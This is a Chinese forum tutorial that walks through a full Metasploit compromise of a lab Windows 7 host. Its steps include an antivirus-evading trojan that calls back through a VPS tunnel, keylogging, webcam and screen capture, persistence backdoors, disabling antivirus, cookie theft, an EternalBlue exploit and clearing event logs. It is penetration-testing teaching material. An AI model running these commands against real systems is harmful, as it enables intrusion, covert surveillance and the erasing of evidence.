历史记录

    清空历史记录
    • 相关的动态
    • 相关的文章
    • 相关的用户
    • 相关的圈子
    • 相关的话题
    注册 登录
    Metasploit一条龙服务
    TimeS0ng 安全工具 13641浏览 · 2017-11-13 04:56

    Metasploit

    0x00. Metasploit Framework简介

      Metasploit是目前最流行、最强大、最具扩展性的渗透测试平台软件,是笔者最崇拜也最喜欢的工具没有之一,下面我将用msf给大家带来一场盛大的内网渗透体验,别眨眼噢!

    0x01. 实战操作

    环境准备:

    1. 靶机win 7   IP=192.168.43.150

    2. kali linux   IP=192.168.43.153

    3. VPS服务器   IP=xx.xx.xx.xx

    实战演示:

    1. 先用evil-evasion生成具有一定免杀功能的windows木马,监听地址设成VPS的地址(打码防D),然后将VPS上的2333端口映射到内网kali的2333端口,同时还要修改VPS上的ssh配置,不然别人是连不上VPS的(在实战中自己常常在内网,所以这里介绍一下VPS)

    vi /etc/ssh/sshd_config && GatewayPorts:yes

    ssh -CfNg -R xx.xx.xx.xx:2333:192.168.43.153:2333 root@xx.xx.xx.xx -p 29402

    2. 启动kali设置msf监听,lport=2333,lhost=192.168.43.153(注意:这里的监听地址是kali的地址,不是VPS的),关于msf的基本操作网上有很多,这里不过多介绍,大家可以参考这个系列文章

    [*]如果想要在docker启动持续监听可以用如下命令

    set exitonsession false && run -j

    3. 在win 7 中执行木马

    4. 接收到meterpreter之后就应该将自己的进程迁移到一个隐蔽的进程中去,防止被查杀,这里笔者迁移到win 7的桌面进程

    migrate 1988 && getpid

    5. 查看当前权限、系统信息,并尝试提权

    getuid && sysinfo && getsystem

    6. 查看网络、路由信息

    ifconfig && route

    7. 监视靶机的桌面

    run vnc

    8. 启动键盘监听

    keyscan_start && keyscan_dump

    9. 设置后门,维持权限

    run persistence -U -i 10 -p 2333 192.168.43.153

    run persistence -X -i 10 -p 2333 192.168.43.153

    10. 截屏查看靶机当前桌面

    screenshot

    11. 查看当前系统空闲时间

    idletime

    12. 禁用靶机使用键盘鼠标(笔者win 7系统是64位的,不支持这个操作)

    uictl disable keyboard

    uictl disable mouse

    13. 查找靶机中重要的敏感文件

    search -d c:\\ -f payload.exe

    14. 指定下载靶机中的文件到本地

    dowmload c:\\Users\\root\\Desktop\\payload.exe /root/Desktop

    15. 上传指定本地文件到靶机中

    upload /root/Desktop/hack.jpeg c:\\Users\\root\\Desktop\\payload.exe

    16. 打开靶机摄像头,win 7虚拟机没有摄像头所以没反应

    webcam_snap

    0x02. 后渗透测试

    1. 调用post模块查看当前系统可用的提权模块

    run post/multi/recon/local_exploit_suggester

    2. 调用payload模块对靶机进行远程桌面操作

    set payload windows/vncinject/reverse_tcp

    set viewonly no

    3. 关掉靶机中的杀软

    killav

    4. 收集靶机浏览器的敏感信息(访问记录、cookie)

    run post/windows/gather/enum_ie

    5. 设置路由转发,扫描内网机器开放的端口(route add 靶机IP 子网掩码 sessions)

    route add 92.168.43.150 255.255.255.0 3

    use auxiliary/scanner/portscan/tcp

    6. 扫描一波内网有没有ms17_010漏洞的主机

    use auxiliary/scanner/smb/smb_ms17_010

    7. 笔者扫到win 7就有这个漏洞,然后就愉快的调用exp搞一波

    use exploit/windows/smb/ms17_010_eternalblue

    8. 功成身退

    clearev

    0x03. 结语

      msf是真的强大,笔者总结的这些也只算是九牛一毛,大家在平时使用时多总结一定能玩出花儿来!

    2 人收藏 0 人喜欢 转载 分享
    8 条评论
    某人
    表情
    可输入 255
      发布投稿
    热门文章
    优秀作者
    目录
    先知社区
    本站/app由 Djingoii 提供技术和产品支持